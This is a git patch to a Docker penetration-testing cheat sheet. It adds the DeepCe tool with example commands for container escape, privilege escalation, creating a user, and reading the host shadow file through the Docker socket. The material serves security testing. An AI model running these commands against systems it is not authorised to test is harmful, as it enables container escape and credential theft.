From f48ee0bca55a4af782a8cc841406416dda43018e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 6 Dec 2020 18:59:43 +0100 Subject: [PATCH] Deepce - Docker Enumeration, Escalation of Privileges and Container Escapes --- Methodology and Resources/Container - Docker Pentest.md | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index a72ce2c..f7d7ba1 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -15,11 +15,18 @@ ## Tools -* Dockscan : https://github.com/kost/dockscan +* [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations ```powershell dockscan unix:///var/run/docker.sock dockscan -r html -o myreport -v tcp://example.com:5422 ``` +* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) + ```powershell + ./deepce.sh + ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce + ./deepce.sh --no-enumeration --exploit SOCK --shadow + ./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked" + ``` ## Mounted Docker Socket